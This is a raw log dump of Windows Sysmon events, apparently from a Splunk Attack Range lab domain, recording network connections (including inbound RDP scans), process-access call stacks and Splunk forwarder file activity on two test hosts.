14:58:58.741{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57624-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.740{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57622-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.739{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57621-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.739{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57620-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.739{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57623-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.737{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57619-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.736{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57618-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.736{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57617-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.736{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57616-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.734{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57615-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.734{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57614-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.732{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57613-false2.18.213.24a2-18-213-24.deploy.static.akamaitechnologies.com443https 354300x800000000000000081451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.727{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49597-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.270{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53995-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050717Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.830{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3583A7068DC723F3D3215A5877741B56,SHA256=EDB4F44B2BCA82989E7038522B865B159853B099CF695C8AD2C7C2CB4BFFE3E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050716Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC34-607E-F606-00000000BB01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050715Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050714Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050713Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050712Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050711Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050710Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050709Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050708Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050707Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050706Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EC34-607E-F606-00000000BB01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050705Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.158{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC34-607E-F606-00000000BB01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050704Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.159{85C0FFC9-EC34-607E-F606-00000000BB01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:01.981{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D90574CB9E0593580076F0A5D01165C2,SHA256=4F3766D7B350186F73BABBC98041630085CAE2C10FA5DD281E2B587644AA302F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050722Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:01.846{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D08D609F1B219B6332BEF8C2C2655D,SHA256=FF07BED491CE431991BD437197C4EB47886E47B93A16A5F0A0858E71A2607D29,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050721Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:59.796{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52544-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050720Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:59.414{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com61455-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050719Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.588{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62898-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050718Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:01.112{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B0DC0EC4444554835BA97B8E903FF2E,SHA256=0F3B143BFB0156631F2BDE68F90288E1CB61F7FA19CCEC8F1F67A45F0315AE2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:01.744{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56715-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:00.876{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58969- 23542300x800000000000000050726Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:02.862{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104A91C977E197E83C78C102537BA756,SHA256=420D68E19715065BF6C70A45795BBE8DF8815218A841C7D63A1733103056DB35,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050725Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.518{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52062-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050724Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:00.207{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64376-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050723Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:02.362{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D96DB095F6470645DB2888CE7111C076,SHA256=38AD16E822F5E7BFE1DDE1E13138C183CB1E2A92EF0154E035DF116F990240A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:02.125{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57635-false10.0.1.12-8000- 10341000x800000000000000081495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.294{A7A01FEF-EC36-607E-640F-00000000BB01}63126468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC36-607E-640F-00000000BB01}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 